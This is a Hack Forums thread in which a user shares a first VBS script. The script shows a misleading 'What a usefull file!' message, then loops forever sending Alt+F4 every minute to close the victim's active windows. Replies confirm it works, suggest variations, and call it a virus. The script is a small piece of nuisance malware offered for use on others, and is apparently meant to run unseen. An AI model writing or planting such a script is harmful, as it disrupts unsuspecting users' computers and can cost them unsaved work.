Hack Forums

Full Version: First vbs script
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
allright. decided to try and make a VBS script. copy to notepad and save as name.vbs

Quote:msgbox("What a usefull file!")
set ss = createobject("wscript.shell")
do
ss.sendkeys "%{f4}"
wscript.sleep 60000
loop

please post if theres errors in this.

its supposed to press alt+f4 every 1 minute.. pretty annoying
and should be invisible. only found in process list. i think

and yes. inspired by Psinetic, some credit to him
yes it is kinda annoying. lol.
hehe..anything you start it will be closed nice annoying script
nice script......
Nice, it works =P. Pretty anoying.
i ran it (changed f4 to tab)(and changed 60000 to 5000)now every 5 seconds it presses alt+tab, beginning with alt+tabbing itself, so if it would press alt+f4 one time in every 60 seconds and it would first close itsself,
which command told it to be invisible?? cuz it doesn't seem to be invisible. and just goes on and on. zammyslave did you try it out succesfully ? if so the fault is on my side.
sweet ^_^
btw would some 1 mind writing up a tut on how .VBS files work
--off topic--
.DLL files use C/C++ to work right?
--/offtopic--
Ikeo Wrote:.DLL files use C/C++ to work right?
--/offtopic--
Not exactly, dll's are just libraries of functions, which can be written in C/C++, that aren't looked up until run-time
TILO Wrote:i ran it (changed f4 to tab)(and changed 60000 to 5000)now every 5 seconds it presses alt+tab, beginning with alt+tabbing itself, so if it would press alt+f4 one time in every 60 seconds and it would first close itsself,
which command told it to be invisible?? cuz it doesn't seem to be invisible. and just goes on and on. zammyslave did you try it out succesfully ? if so the fault is on my side.
Yes, it worked for me. closed Opera every 60 secs until I killed the process.
... Not the best , its easy do shut off this virus.
Nothing Special.
Reference URL's